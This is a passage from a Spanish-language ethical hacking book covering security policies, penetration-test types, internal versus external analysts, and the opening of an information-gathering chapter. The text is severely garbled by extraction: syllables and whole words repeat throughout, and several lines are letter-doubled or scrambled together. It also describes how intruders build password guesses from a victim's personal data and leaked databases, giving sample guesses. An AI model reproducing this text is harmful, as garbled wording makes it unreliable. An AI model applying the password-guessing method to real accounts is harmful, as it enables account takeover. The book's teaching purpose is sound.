 Material acerca de políticas Si quere queremos mos obte obtener ner más infor informa mación ción sobre sobre polí políti ticas cas y estu estudiar diar profun profunda damen mente te sosobre ellas, pode podemos mos visi visitar tar los siguien siguientes tes sitios: sitios: www.se www .segu-in gu-info fo.co .com.ar m.ar/po /poli liti ticas cas (ha (hayy que que regis registrar trarse se en la lista Segu-info) y www.se www .segu-in gu-info fo.co .com.a m.ar/ar r/arti ticu culos/59-es los/59-escri cribien biendo-po do-poli liti ticas-se cas-segu guri ridad.htm dad.htm

39

 

aspecto to téc técni nico. co. Una cosa cosa es refor reforzar zar técni técnica camen mente te la ri ridad dad infor informá máti tica  ca  en el aspec segu se guri ridad dad de un ser vi  vidor dor median mediante te har ejemplo, redac redactar tar harde dening, ning, y otra es, por ejemplo, una polí políti tica ca de uso de Inter Internet net de modo modo segu seguro ro y respon responsa sable ble por parte parte de los emplea em pleados. dos. A conti continua nuación, ción, vere veremos mos algu algunos nos de los descui descuidos dos típi típicos cos con los que una orga organi niza zación ción formal formal cuenta: cuenta: • La OF ha cr creeci cido do de modo modo desor desorde dena nado do y, por si fuera fuera poco, poco, está está en extre extremo mo ininforma for mati tiza zada, da, sin segu seguri ridad dad míni mínima ma o norma normati ti va  va de or orga gani niza zación ción algu alguna. na. Es el títípico pi co caso caso de incon inconta tables bles empre empresas sas fami familia liares res que, por di versos  versos facto factores res polí políti ticoco-

económi econó micos, cos, crecen crecen hasta hasta ser grandes grandes expor exporta tado dores res o impor importa tado dores, res, o bien indus indus-triales tria les manu manufac factu ture reros, ros, y agrandan agrandan su siste sistema ma infor informá máti tico co al ritmo ritmo de su perso personal nal sin lógi lógica ca algu alguna, na, susten sustentan tando do la segu seguri ridad dad con sólo sólo actua actualilizar zar el siste sistema ma opera operati ti- vo de sus termi termina nales les y utili utilizan zando do algún algún que otro anti anti virus,  virus, desac desactua tualiliza zado. do. Muchas Muchas de estas estas empre empresas sas saben saben que tienen tienen que imple implemen mentar tar segu seguri ridad dad infor informá máti tica ca y de la infor informa mación, ción, pero pero no saben saben cómo cómo abordar abordarlo. lo. • La OF OF es está acostum acostumbra brada da a la reacción reacción y no a la proacción proacción (actuar (actuar de modo modo anantici ti cipa pado). do). Aguarda Aguarda a que suce suceda da algún algún inci inciden dente te para para hacer hacer algo, algo, antes antes de imple imple-mentar men tar algo algo de modo modo segu seguro ro y sin haber haber compro comprome meti tido do nada nada por omisión, omisión, desin desin-terés o descui terés descuido. do. Muchas Muchas de estas estas empre empresas sas simple simplemen mente te no se inte intere resan san en la inin versión  ver sión pre via en cuestio cuestiones nes de segu seguri ridad, dad, a menos menos que se hayan hayan dado dado cuenta cuenta de algún al gún inci inciden dente te de ese tipo, tipo, cuando cuando ya es dema demasia siado do tarde. tarde. No son conscien conscientes tes de los bene benefi ficios cios que tiene tiene para para la orga organi niza zación ción el pe pene netra tration tion testing  testing o chequeo chequeo de segu se guri ridad dad (descu (descubrir brir las vulne vulnera rabi bililida dades des del siste sistema ma antes antes de que éstas éstas sean enencontra con tradas das y explo explota tadas das por un terce tercero ro no auto autori riza zado do u otra amena amenaza). za). • La OF OF con contra trata ta perso personal nal de segu seguri ridad dad con un perfil perfil inade inadecua cuado do a su esce escena nario rio y  contex con texto. to. (más detalles sobre este punto en el Cap9) • La depen penden dencia cia de su depar departa tamen mento to de segu seguri ridad dad hace hace inefi inefica caces ces sus polí políti ticas. cas. No logran logran la inte interre rrela lación ción de sus secto sectores res y no alcan alcanzan zan el compro compromi miso so de la gegerencia ren cia para para que la tota totalilidad dad del plantel plantel acate acate las polí políti ticas, cas, dando dando lugar lugar a dife diferen rentes tes tipos ti pos de proble problemas. mas. Uno de los inte interro rrogan gantes tes más comu comunes nes en estos estos casos casos es de quién debe debe depen depender der el depar departa tamen mento to Segu Seguri ridad dad de la infor informa mación. ción. • La OF no sa sabe be abordar abordar la redac redacción ción de las polí políti ticas cas de segu seguri ridad dad (o del análi análisis sis de riesgo) riesgo) o su imple implemen menta tación. ción. A veces veces se sola solapan pan con polí políti ticas cas de orga organi niza zación, ción, con inci inciden dencia cia en la diná dinámi mica ca de la infor informa mación ción inter intersec secto torial rial y comu comuni nica cacio ciones. nes. Debemos Debe mos recor recordar dar que la infor informa mación ción signi signifi fica cati ti va  va y a tiempo tiempo es vital vital para para la toma toma de deci decisio siones nes en lo geren gerencial, cial, y a la vez deci decisi si va  va para pa ra lograr lograr los obje objeti ti vos  vos de la oror gani ga niza zación. ción. El ethi ethical cal hacking hacking aporta aporta el meca mecanis nismo mo para para lograr lograr cana canales les (y repositorios) más segu seguros ros para para esa infor informa mación ción y otros acti acti vos.  vos.

40

 

NETWORK WORK SECU SECURITY RITY ASSESS ASSESSMENT MENT NET  Adéntrate  Adéntra te en la nada, nada, acome acomete te contra contra el vacío, vacío, rodea rodea lo que de fien  fien-de, asálta asáltalo lo donde donde no te es pere.  pere. Sun Tzu

(The Art of war) En las pági páginas nas ante anterio riores res defi defini nimos mos los puntos puntos más inte intere resan santes: tes: • • • • • • •

El intru truso so como como amena amenaza. za. La orga gani niza zación ción formal formal (OF) como como siste sistema ma o esce escena nario rio en riesgo. riesgo. La ge gestión y el méto método do orga organi niza zati ti vo  vo como como opti optimi miza zado dores res de la OF. El acti vo  vo como como valor valor precia preciado do de la OF. El ha hacking ético ético como como herra herramien mienta ta o meca mecanis nismo. mo. El pr profe fesio sional nal de segu seguri ridad dad como como ejecu ejecutor tor del testeo. testeo. Las té técni nicas cas como como parte parte del net work  work secu security rity assess assessment. ment.

El mayor mayor conte conteni nido do del libro libro se basa basa en este este últi último mo punto, punto, pero pero no podía podíamos mos llellegar a él y ver sólo sólo técni técnicas cas deta detalla lladas das de testeo testeo sin antes antes cono conocer cer de qué se trata trata el resto, res to, ya que impor importan tante te saber saber dónde dónde enca encaja ja cada cada uno de estos estos compo componen nentes. tes. La red está está llena llena de script kiddies kiddies (al (algu gunos nos de ellos si dejan de perder tiempo y  estudian, podrían podrían ser el día de maña ma ñana na profe profesio siona nales), les), y como no saben saben por dóndónde empe empezar, zar, lo prime primero ro que utili utilizan zan es lo que tienen tienen a mano: mano: una herra herramien mienta ta o la descrip descripción ción deta detalla llada da de una simple simple técni técnica ca de intru intrusión sión que leye leyeron ron en algún algún correo co rreo o foro. foro. Aclare Aclaremos mos que un script kiddie kiddie es aquella aquella perso persona na que, sin cono cono-cimien ci miento to algu alguno no de proto protoco colos, los, siste sistemas mas opera operati ti vos,  vos, ni se segu guri ridad dad de la infor informa ma-ción, se vale vale de una herra herramien mienta ta o técni técnica ca ajenas ajenas para para come cometer ter intru intrusio siones nes en InInternet ter net u otras redes, redes, o al menos menos inten intentar tarlo. lo. Lógi Lógica camen mente, te, puede puede tener tener las más di versas  ver sas inten intencio ciones. nes. Por otro lado, net network work secu securit  rit   y a ssess sessment  ment , es uno de los nomnombres que suele suele tener tener el pene penetra tration tion testing testing o chequeo chequeo de pene penetra tración, ción, también también cono cono-cido ci do como como tes prueba de pene penetra tración ción o hacking hacking ético, ético, cocotesteo teo de vulne vulnera rabi bili lida dades des, prueba mo suele suele llamár llamárse selo lo por estos estos días. El bene benefi ficio cio de éste éste para para la orga organi niza zación ción es que ella se conoz conozca ca a sí misma misma en cuestio cuestiones nes de vulne vulnera rabi bililida dades des y poten potencia ciales les brechas brechas de segu seguri ridad dad en el siste sistema ma de infor informa mación, ción, emulando en ataques tanto a script kiddies como tambien, a hábiles intrusos. Este Es te chequeo chequeo de segu seguri ridad dad puede puede ser ex desde Inter Internet net hacia hacia un sitio sitio web de exter terno no si es desde e-commer e-com merce ce o hacia hacia termi termina nales les de una red corpo corpora rati ti va  va o com compo ponen nentes tes de ésta; ésta; o in inter ter-desde de una misma misma red, emulan emulando do un emplea empleado do o bien un intru intruso so que ha lolono si es desde grado gra do ingre ingresar sar desde desde el exte exterior rior a la red inter interna na de la orga organi niza zación. ción. Es siempre siempre de cacarácter rác ter técni técnico, co, al contra contrario rio de una audi audito toria ria de segu seguri ridad dad IT en la que se comprue comprueban ban 41

 

pasan san a re vi  visión sión las polí políti ticas cas y los proce procedi dimien mientos. tos. También También puede puede deno denomi minár nárse selo lo cocoo pa

mo: •  Whi chequeo lle va  vado do a cabo cabo por un pentes pentester ter que tiene tiene toda toda  White te Box Test : es un chequeo la infor informa mación ción acerca acerca del siste sistema. ma. • Black Box Test : este este chequeo chequeo es lle va  vado do a cabo cabo desde desde cero, cero, sin infor informa mación, ción, tal como co mo lo haría haría un intru intruso so cualquie cualquiera ra y lle va mucho mucho más tiempo. tiempo. • Grey Box Test : se cuenta cuenta con cono conoci cimien mientos tos parcia parciales les del obje objeti ti vo,  vo, siempre siempre brinbrindados da dos por la misma misma orga organi niza zación. ción. Gene Ge neral ralmen mente, te, las orga organi niza zacio ciones nes se alinean alinean bajo bajo algu alguna na meto metodo dolo logía gía para para reali realizar zar el testeo, tes teo, aunque aunque otras más versá versáti tiles les optan optan por hacer hacerlo lo de modo modo más arte artesa sanal, nal, lo cual no signi signifi fica ca gran dife diferen rencia cia siempre siempre y cuando cuando el profe profesio sional nal sepa sepa diri dirigir gir el assess assess-ment (ataque) (ataque) adecua adecuada damen mente te y no deje deje obje objeti ti vos,  vos, deta detalles lles o tramos tramos ol vida  vidados. dos.

En el progra programa ma de 5º año de Inge Ingenie niería ría en Siste Sistemas, mas, la Univer Universi sidad dad Abierta Abierta Inte In tera rame meri rica cana na (www.va (www.vane nedu duc.e c.edu.a du.ar/uai/) r/uai/) posee posee la mate materia ria Segu Seguri ridad dad Infor Informá máti tica. ca. Compren Com prende: de: cifra cifrados, dos, segu seguri ridad dad de la infor informa mación ción (análi (análisis sis de riesgo, riesgo, contin contingen gencia, cia, audi au dito torias), rias), detec detección ción de intru intrusos, sos, segu seguri ridad dad en red, filtra filtrado do de paque paquetes tes y fire firewalls, walls, hacking hac king y admi adminis nistra tración ción segu segura ra de plata platafor formas mas y aplica aplicacio ciones nes (harde (hardening). ning).

Materia.

Para evitar Para evitar circuns circunstan tancias cias inde indesea seadas, das, existe existe la plani planifi fica cación ción pre via, que sir ve  ve pa para ra deter de termi minar nar el alcan alcance ce que tendrá, tendrá, los lími límites, tes, los obje objeti ti vos  vos y la buena bue na utili utiliza zación ción de recur re cursos. sos. En muchos muchos casos, casos, se discu discute te quién debe debería ría lle var  varlo lo a cabo, cabo, si perso personal nal propio pro pio de la orga organi niza zación ción o terce terceros ros contra contrata tados. dos. Para Para tomar tomar esta esta deci decisión, sión, entra entra en juego juego la éti integran grantes tes del depar departa tamen mento to de siste sistemas mas y el de segu seguri ridad dad ética  ca de los inte infor in formá máti tica, ca, dado dado que tienen tienen que repor reportar tar fallas fallas o imple implemen menta tacio ciones nes defi deficien cientes, tes, quizá qui zá lle va  vadas das a cabo cabo por cole colegas gas de la misma misma ofici oficina. na. Hay que prestar prestar suma suma atenatención a los conflic conflictos tos de inte intere reses ses que pueden pueden crearse crearse en emplea empleados, dos, admi adminis nistra trado do-res y analis analistas tas de una misma misma empre empresa sa en una búsque búsqueda da de estas estas carac caracte terís rísti ticas. cas. 42

 

 Al ser ana analis lista ta ex exter terno no, generar un reporte de seguridad detallado es una incógnita para los empleados de seguridad o sistemas de la organización que nos ha contratado, hasta que se entrega. La ética difícilmente pueda ser menoscabada, aunque los recursos utilizados (tiempo, herramientas, dinero y recursos humanos) suelen ser mayores.  Al ser analista interno, sey por faciltanto facilita ita la tarea porquelos se recursos conoce mejor y deymodo real el sistema de información, disminuyen utilizados se complica en otros aspectos. En algunas organizaciones es muy común que, al encontrar algo, se avise al colega administrador o analista para que lo solucione y así no figure en el reporte. Si bien eso sería mitigar rápido el problema, es una falta de ética profesional y un ejemplo de innumerables vicios relacionados. Lo más recomendable es que se implemente todo de manera correcta y, en lo posible, que se desarrolle el sistema desde cero. Luego de realizar relevamientos exhaustivos, conviene que se planifique y se definan los procesos adecuadamente (hasta la dependencia más primitiva), ya que en el transcurrir del tiempo deberán ser siempre depurados. También hay que tener en cuenta la escalabilidad a futuro y un plan de contingencia para asegurar la continuidad del negocio y el procesamiento de datos. La idea es llegar a un nivel de organización y de seguridad maduro que sea auditado y chequeado por analistas externos junto a analistas de organización y métodos. Crear un comité para debatir los resultados e implementaciones, y mitigar las falencias encontradas de modo serio. Controlar y auditar para mejorar, reclutar  verdaderos talentos talentos y formarlos más aun en la empresa.  Todo esto es valor agregado en la búsqueda del objetivo por parte de la organización, por tal motivo, hay que tratar de cumplir muy bien nuestro rol si vamos a dedicarnos de lleno al tema.

Sitios de Educación.  www.sistemas.frba.utn.edu.ar  www.caece.edu.ar/Grado/Ing_Sistemas.asp  www.isec-global.com  www.rsa.com/training/pdfs/EDCRS_GD_1004.pdf   www.checkpoint.com/services/education/certification  www.cisco.com/web/learning   www.comptia.org   www.itmaster.com.ar  www.itcollege.com.ar

43

 

 www.centraltech.com.ar  www.centraltech.com.ar  www.cybsec.com/ES/servicios/capa  www.cybsec.com/ES/ servicios/capacitacion.php citacion.php  www.bs.com.ar  www.proydesa.org   www.proydesa.o rg 

Noticias  www.derkeiler.com  www.net-security.org   www.seclists.org   www.securitytracker.com/signup/sig  www.securitytracker.co m/signup/signup_now.htm nup_now.htmll  www.microsoft.com/technet/securit  www.microsoft.com/ technet/security/ y/  www.kernel.org/pub/linux/d  www.kernel.org /pub/linux/docs/lkml/ ocs/lkml/ http://lists.grok.org.uk/ http://lists.g rok.org.uk/pipermail/full-di pipermail/full-disclosure sclosure  www.hispasec.com  www.securiteam.com/mailinglist.htmll  www.securiteam.com/mailinglist.htm  www.whitehatsec.com www.segu-info.com.ar

Es un sitio dedicado a la seguridad de la información con una gran comunidad. Cuenta con varios mailing lists, y los temas centrales de éstos son la seguridad de la

información, la seguridad informática y las leyes relacionadas con la seguridad de la información, información. Se llevan a cabo tanto discusiones entre profesionales como concientización sobre seguridad a gente que utiliza recursos tecnológicos e Internet. 44

 

2 > Recabar información Técn Té cnic icas as us usua uale les s qu que e se ut util iliz izan an pa para ra la reco re cole lecc cció ión n de da dato tos s an ante tes s de la em emul ulac ació ión n de un at ataq aque ue. . As Asim imis ismo mo, , ve vere remo mos s la prep pr epar arac ació ión n de lo los s me medi dios os, , la en enum umer erac ació ión n y la cl clas asif ific icac ació ión n de lo los s da dato tos s ob obte teni nido dos s para pa ra la de defi fini nici ción ón o la pl plan anif ific icac ació ión n de del l asal as alto to al ob obje jeti tivo vo. . Tod odo o est sto o mo most str rad ado o tan ant to des esd de el pun unt to de vis ista ta de un pro rofe fes sio iona nal l ét étic ico o, com omo o en el de un int ntr rus uso, o, pa par ra hac ace er not otor ori ias la las s

diferencias.

 

INFORMATION GATHERING Se de deno nom min inaa in info forrma mati tion on ga gatthe heri ring ng a la ins nsttan anci ciaa pr prev eviia al int nteent nto o de ej ejec ecut utaar un unaa intr in trus usiión in info forrmá máti ticca a un si sist stem emaa po porr pa part rtee de al algu guie ien n no au auto torriz izad ado. o. Ta Tamb mbié ién n es empl em plea eada da (g (gen ener eral alme ment ntee en or orga gani niza zaci cion ones es)) po porr lo loss pr prof ofes esio iona nale less ét étic icos os en ca caso so de ases as esta tarr un unaa co comp mpro roba baci ción ón de se segu guri rida dad. d. In Info form rmat atio ion n ga gath ther erin ingg im impl plic icaa ll llev evar ar a ca ca-bo la tarea pr preevia y minuciosa de intelige gen ncia (similar a un reconoc ociimient nto o del terecolec comrren rr eno) o),, má máss pr prec ecis isam amen ente te a l a reco lección ción d e d atos acerca acerca del ob je  jeti tiv  v o o d e al g   g ún com ponen  po nente te rel  rel ac io ion nado a este este o a parte parte de él . Esta Esta fase fase se compo compone, ne, funda fundamen mental talmen mente, te, de in ves  vesti tiga gación ción y análi análisis sis de datos datos reca recaba bados. dos. El siste sistema ma de infor informa mación ción cuenta cuenta con incon inconta tables bles piezas piezas y, por lo tanto, tanto, el factor factor per permea meable ble (bre (brecha o les, agucompren aguje jero roprendi de segu se guri ridad) dad) ini cialfalla éste éste po podría en trarse se encualquie cual quiera ra de loscha ni veles,  ve com didos dos entreinicial entre una fade lla huma hu mana, na,dría unaencon decontrar infraestruc infraes tructura tu ra (técni (técnica), ca), lógi lógica ca y hasta hasta exter externa na por los agentes agentes in vo  volu lucra crados dos (por ejemplo, ejemplo, un pro vee  veedor dor de Inter Internet net o hosting hosting inse insegu guro ro o una sucur sucursal sal con su red despro desprote tegi gida) da) o distin distintos tos ambien ambientes tes inter interco conec necta tados. dos. Los datos datos que buscan buscan los intru intrusos sos antes antes de atacar atacar pueden pueden estar estar rela relacio ciona nados dos con alalgún emplea empleado, do, ya sea ejecu ejecuti ti vo  vo u ope opera rario, rio, con algún algún siste sistema ma o tramo tramo de él o con algún al gún proce procedi dimien miento to u opera operación ción que nos permi permita ta inter inter venir  venir en él. También También puede puede ser una direc dirección ción IP, un sitio, sitio, una red, una aplica aplicación, ción, un ser vicio  vicio (puerto (puerto abierto abierto de auten autenti tifi fica cación ción o no), un proto protoco colo, lo, un deter determi mina nado do descui descuido do de progra programa mación ción o de admi adminis nistra tración, ción, un direc directo torio, rio, un docu documen mento, to, una plata platafor forma ma o bien cualquier cualquier dato da to de ubica ubicación ción físi física ca o deno denomi mina nación ción de algún algún sector sector de la misma misma orga organi niza zación. ción. Por supues supuesto, to, si puede puede direc directa tamen mente te conse conseguir guir logins, logins, lo inten intenta tará. rá. No inte intere resa sa si el dato dato es muy impor importan tante te o casi casi insig insigni nifi fican cante. te. Todo Todo es útil a la hohora de la esca escala lada da en el siste sistema ma y la pre via plani pla nifi fica cación ción de este este emba embate te (chequeo (chequeo o simu si mula lación ción de ataque). ataque). Algu Algunas nas de las pregun preguntas tas útiles útiles antes antes de proce proceder der serían: serían:

• ¿Qué sa sabe bemos mos de nuestro nuestro obje objeti ti vo?  vo? • ¿Dónde están están sus redes, redes, sitios sitios o por dónde dónde fluye fluye su infor informa mación? ción? • ¿Q ¿Qué ué par partes lo confor conforman? man?

Plataforma, arquitectura y sistema operativo Platafor Plata forma, ma, arqui arquitec tectu tura ra y siste sistema ma opera operati tivo vo no son lo mismo. mismo. La arqui arquitec tectu tura ra es in inter terna na del hardwa hard ware re y a quien va diri dirigi gido do un siste sistema ma opera operati tivo. vo. Veamos Veamos algu algunos nos ejemplos, ejemplos, con la arqui arqui-tectu tec tura ra entre entre parén parénte tesis: sis: Digi Digital tal UNIX (alpha), (alpha), FreeBSD (i386), Linux Linux (i386, m68k, alpha, alpha, popowerpc, mips, arm), SCO (i386), Sola So laris ris (sparc, sparc64, i386, m68k), Windows Win dows (i386, amd64).

46

 

• • • •

¿Qué si ¿Qué sisste temas mas poseen poseen y como como están están forma formados? dos? ¿Cómo se llaman llaman los inte integran grantes tes de la orga organi niza zación? ción? ¿Quiénes son sus emplea empleados dos y qué hacen? hacen? ¿Cómo ¿Cómo y dónde? dónde? ¿Qué in infor forma mación ción sobre sobre ellos se puede puede consul consultar tar o conse conseguir guir en Inter Internet? net?

Un viaje viaje de 1000 leguas leguas comien comienza za con el primer primer paso, paso, decían decían los chinos. chinos. Así, por ejemplo, ejem plo, saber saber con qué plata platafor formas mas vamos vamos a tener que lidiar lidiar o cono conocer cer algu algunos nos usuarios usua rios del siste sistema, ma, es un buen comien comienzo. zo.

En este este sitio sitio www.learn www.learnse secu curit rityon yonli line ne.c .co om po pode demos mos encon en contrar trar cursos cursos gratui gratuitos tos para para aprender aprender sobre sobre segu seguri ridad, dad, foros foros para pa ra consul consultar tar a cole colegas, gas, videos videos sobre sobre técni técnicas cas de intru intrusión sión y desa desafíos. fíos. Online.

Comúnmen Común mente, te, se deno denomi mina na foot printing  (siguien (si guiendo do la huella huella de pisa pisadas) das) a esta esta reco recolec lec- prin ting  ción de infor informa mación ción pre via  via.. De De to todos modos, modos, cada cada atacan atacante te o consul consultor tor tiene tiene sus propropios méto métodos dos y recur recursos sos duran durante te esta esta búsque búsqueda. da. Mientras Mientras más minu minucio ciosa sa e inge ingenio niosa sa sea, más posi posibi bililida dades des tendrá tendrá de dar con un descui descuido, do, un obje objeti ti vo  vo o por por lo me menos, nos, una pista pis ta para para comen comenzar zar con otra etapa etapa del emba embate. te. Por ejemplo, ejemplo, un atacan atacante te real que poposee en su haber haber algu algunas nas o la mayo mayoría ría de las bases bases de datos datos de ISP (pro vee  veedo dores res de InInternet) ter net) del país, o tiene tiene acce acceso so a ellas, cuenta cuenta con una clara clara venta ventaja ja sobre sobre el resto resto ya que, en éstas, éstas, posi posible blemen mente te habrá habrá mucha mucha infor informa mación ción útil rela relacio ciona nada da con perso personas nas de la orga organi niza zación ción que pueden pueden tener tener algún algún dato dato impor importan tante, te, como como pass word  words, s, o perpermiten mi ten conse conseguir guirlo. lo. Estos Estos datos datos pueden pueden ser vir  vir pa para ra compro comprome meter ter el siste sistema ma o parte parte de 47

 

él. La venta ventaja ja del intru intruso so en esta esta fase fase del ataque, ataque, si se lo compa compara ra con el hacker hacker ético ético o profe pro fesio sional, nal, es mayor, mayor, dado dado que puede puede utili utilizar zar recur recursos sos no éticos éticos para para la extrac extracción ción o reco re colec lección ción de infor informa mación ción pasi pasi va  va (o no) no) del del obje objetiti vo.  vo. El El cono conoci cimien miento to de estas estas venventajas ta jas por parte parte del profe profesio sional, nal, y saber saber cómo cómo lidiar lidiar con ellas, hará hará que el siste sistema ma que se quiere quiere prote proteger ger tenga tenga la norma normatiti va  va adecua adecuada da y contro controla lada, da, luego luego de un exhaus exhaustiti vo  vo chequeo. che queo.

Consul Con sultas tas a bases bases de datos datos La reco recolec lección ción de datos datos pre vios al ataque ataque gene general ralmen mente te comien comienza za en algún algún tipo tipo de base ba se de datos datos y otros recur recursos sos que se dispon dispongan. gan. Cuando son hechas hechas por un intru intru-so, estas estas reco recolec leccio ciones nes a veces veces no son lega legales. les. Un ejemplo ejemplo de consul consulta ta a base base de dadatos ilegal ilegal sería sería el caso caso antes antes mencio menciona nado: do: el intru intruso so que tenga tenga en su poder poder una babase de datos datos de algún algún ISP en el que figu fi guran, ran, por casua casualilidad, dad, los datos datos perso persona nales les de algu al gunos nos inte integran grantes tes de la orga organi niza zación ción que ataca atacará. rá. Éste, És te, luego luego de cote cotejar jar las coinci coinciden dencias cias de perso personas nas (existen (existencia cia tanto tanto en la base base de datos da tos como como en la orga organi niza zación), ción), toma tomará rá los datos datos perso persona nales les de ellos y, acto acto segui segui-do, trata tratará rá de emplear emplear como como pass words sus fe fechas chas de naci nacimien miento, to, sus núme números ros de

do docu cumen mento, ofide oficios cioslayorga mis mismos mos  words allícioutili utique liza zados, dos, pera pero ro auten estenti esta ta vez ención las cuentas cuen tas deto,correo cosus rreo orlos gani niza zación ciónpass u otro ser vicio  vi requiera requie au tififica cación (como ssh, ftp, rlogin rlogin o telnet, telnet, por ejemplo). Entre En tre otras técni técnicas cas (como (como por ejemplo ejemplo la de inge ingenie niería ría social social que vere veremos mos más adeadelante), lan te), también también basa basado do en esos datos, datos, trata tratará rá de desci descifrar frar la entro entropía pía y compo composi sición ción de sus pass words.  words. Vea Veamos mos algu algunos nos ejemplos. ejemplos. Si en su cuenta cuenta perso personal nal la vícti víctima ma tiene tiene una pregun pre gunta ta secre secreta ta rela relacio ciona nada da con un libro libro (supon (suponga gamos mos El princi principi pito) to) o encuen encuentra tra en un foro foro que a esa perso persona na le inte intere resa sa ese libro, libro, el intru intruso so proba probará rá cla ves como como las sisiguientes: guien tes: elprin elprinci cipi pito, to, zorro, zorro, in vi  visi siblea blealo loso sojos, jos, víbo víbora, ra, antoi antoine, ne, exupery, exupery, baobab, baobab, aste asteroi roi-de3251, b612, rosa, rosa, etcé etcéte tera. ra. En otros casos, casos, si el usuario usuario años atrás utili utiliza zaba ba en sus cuen cuentas de ISP cla ves co mo marado mara dona10, na10, el do, intruso intru tam también bién procha, proba bará rá diegui conguito, ma mara dona, na,d1o5,tasdios, capitan, capi tan, macomo mano node dedios, dios, die diegoar goarman mando, laso lape pelo lota tano nose seman mancha, die to,rado 10ma 10maPaliativos Pa liativos

El profe profesio sional nal puede puede miti mitigar gar proble problemas mas redac redactan tando, do, por ejemplo, ejemplo, una polí políti tica ca inter interna na que dicte dicte a sus emplea empleados: dos: no utili utilizar zar passwords passwords rela relacio ciona nados dos con uno mismo mismo ni utili utili-zar esas claves claves en otros ambien ambientes tes perso persona nales. les. Otra forma forma sería sería asignar asignar un deter determi mi-nado na do password, password, elimi eliminan nando do así la posi posibi bili lidad dad de libre libre y mala mala elección elección del emplea empleado. do.

48

 

radona, rado na, pelu pelusa, sa, etcé etcéte tera, ra, tratan tratando do de dar con algu alguna na forma forma actual actual o evolu evolucio ciona nada da de la cla ve, ya que es muy muy pro proba bable ble que el usuario usuario hoy en día también también las utili utilice, ce, o bien, que las haya haya here hereda dado do y las use en otras aplica aplicacio ciones nes de logueo logueo (auten (autenti tifi fica cación-ac ción-acce ceso). so). Inclu In cluso so los datos datos perso persona nales les (como (como nombre nombre y apelli apellido) do) ser virán  virán para para dedu deducir cir los usuarios usua rios de login login y no solo solo la cla ve. El típi tí pico co ejemplo ejemplo es el UserID UserID (el usuario usuario que ante an tece cede de al signo signo @) de las actua actuales les cuentas cuentas de e-mail corpo corpora rati ti vas  vas e ins insti titu tucio ciona nales, les, forma for madas das por la prime primera ra letra letra del primer primer nombre, nombre, segui seguido do del apelli apellido. do. Por ejemplo, ejemplo, ctori cto ri@do @domi minio nio vic  victi tima ma.com. .com. Infor Informa mación ción como como ésta ésta le ser virá  virá al intru intruso so para para sacar sacar más infor informa mación ción aún, quizá quizá desde desde otros luga lugares. res. Esta Esta perso persona, na, además, además, busca buscará rá en bases ba ses ilega ilegales, les, como como la de tarje tarjetas tas de crédi crédito, to, enti entida dades des de aportes aportes jubi jubila lato torios, rios, papadrones dro nes de todo todo tipo tipo (dispo (disponi nibles bles hasta hasta en redes redes P2P), enti entida dades des pri vadas  vadas o baja bajadas das de ser vido  vidores res de orga organi niza zacio ciones nes que fueron fueron pre via  viamen mente te ataca atacadas das y compro comprome meti tidas. das. Para Pa ra el intru intruso, so, una fuente fuente de pass words o da datos tos sensi sensibles bles de ese esti estilo lo es de rele rele- vancia  van cia atempo atemporal. ral. Esto significa que no impor importa ta si la base base de datos datos que tiene tiene en su poder po der es vieja, vieja, ya que podrá podrá usarse usarse en un futu futuro ro como como dato dato signi signifi fican cante te o como como pista pis ta para para conse conseguir guir el dato dato nece necesa sario rio actual. actual.

Es común común además además que éste, éste, más allá del análi análisis sis íntegro del sitio sitio insti institu tucio cional nal del obje ob jeti ti vo,  vo, busque busque también también infor informa mación ción de algún algún compo componen nente te de la orga organi niza zación ción en porta por tales les o sitios sitios rela relacio ciona nados dos con postu postula lacio ciones nes labo labora rales les (miles (miles de currí currícu culum lum vívítae), infor informa mación ción de riesgo riesgo credi crediti ticio, cio, reimpre reimpresión sión de paten patentes tes de auto automó mó vi  viles, les, papadrones dro nes de vota votación, ción, foros, foros, blogs y comu comuni nida dades des onli online ne de todo todo tipo, tipo, juicios juicios o porportales ta les de leyes, leyes, eventos, eventos, regis registros tros de domi dominios, nios, porta portales les de educa educación, ción, guías empre empre-saria sa riales, les, tele telefó fóni nicas, cas, profe profesio siona nales les e indus industria triales, les, búsque búsqueda da de cole colegas, gas, redes redes socia socia-les tipo tipo Lynke Lynkedin, din, Facebook, Sonico, Econoz Econozco co o Myspa Myspace, ce, avisos avisos clasi clasifi fica cados dos de todo to do tipo, tipo, poli policía cía y agencias agencias de segu seguri ridad dad onli online. ne. Como Co mo vemos, vemos, la lista lista es muy exten extensa. sa. Segu Se gura ramen mente, te, el intru intruso so trata tratará rá de compro comprome meter ter cualquie cualquiera ra de estos estos luga lugares res para para exextraer la infor informa mación ción en caso caso de que ésta ésta no sea públi pública ca o de que haya haya que pagar pagar papara consul consultar tarla. la. Si los siste sistemas mas de esos luga lugares res son bastan bastante te segu seguros, ros, enton entonces ces inten inten-ta tará rátacompro com meter ter un usua riotemas lemas legí gíti timo, mo, quisulta quizás zástahasta has volgo  vercredi  verse se diti uno payraotros para hacerque hacer la concon sulta sul (porprome ejemplo, enusuario los siste sis de consul con detariesgo ries cre ticio cio sonabona abo nados dos median mediante te tarje tarjeta ta de crédi crédito to onli online, ne, es posi posible ble que el intru intruso so compre compre esos

Rooteado Rootea do

Rooteado, Rootea do, es slang o lunfar lunfardo do y signi signifi fica ca que el intru intruso so ha esca escala lado do privi privile legios gios (mayo (mayo-res permi permisos sos en el servi servidor) dor) en un siste sistema ma Linux/Unix Linux/Unix hasta hasta llegar llegar a ser un usuario usuario con permi per misos sos de root root (cu (cuen enta ta de máxi máximo mo privi privile legio). gio). Esto Esto le da la posi posibi bili lidad dad de reali realizar zar cuanto cuan to desee desee dentro dentro del siste sistema, ma, siempre siempre y cuando cuando sepa sepa cómo. cómo.

49

 

da datos tos a nombre nombre de otro, con una tarje tarjeta ta ajena). ajena). Por últi último, mo, trata tratará rá de obte obtener ner la ininforma for mación ción de alguien alguien que esté esté dentro dentro de esa orga organi niza zación ción u empre empresa, sa, ya sea por amistad, amis tad, con ve  venien niencia, cia, inter intercam cambio bio o enga engaño. ño. Como Co mo vemos, vemos, no hay límites. Todo Todo vale vale para para los intru intrusos sos en la red, ya sea un chichi co que quiere quiere defor deformar mar una pági página, na, alguien alguien que rootea rootea un ser vi  vidor dor desde desde el kernel kernel o bien un intru intruso so dedi dedica cado do a hacer hacer espio espiona naje je corpo corpora rati ti vo.  vo. Sea por el moti moti vo  vo que sea, ego, curio curiosi sidad, dad, desa desafío fío inte intelec lectual tual o dine dinero, ro, algu algunos nos acactos esta estarán rán descar descarta tados dos por la ética ética de cada cada perso persona, na, como como el uso de tarje tarjetas tas o el dadaño a siste sistemas mas ajenos, ajenos, pero pero no esca escati tima marán rán recur recursos sos de tiempo tiempo y lógi lógica 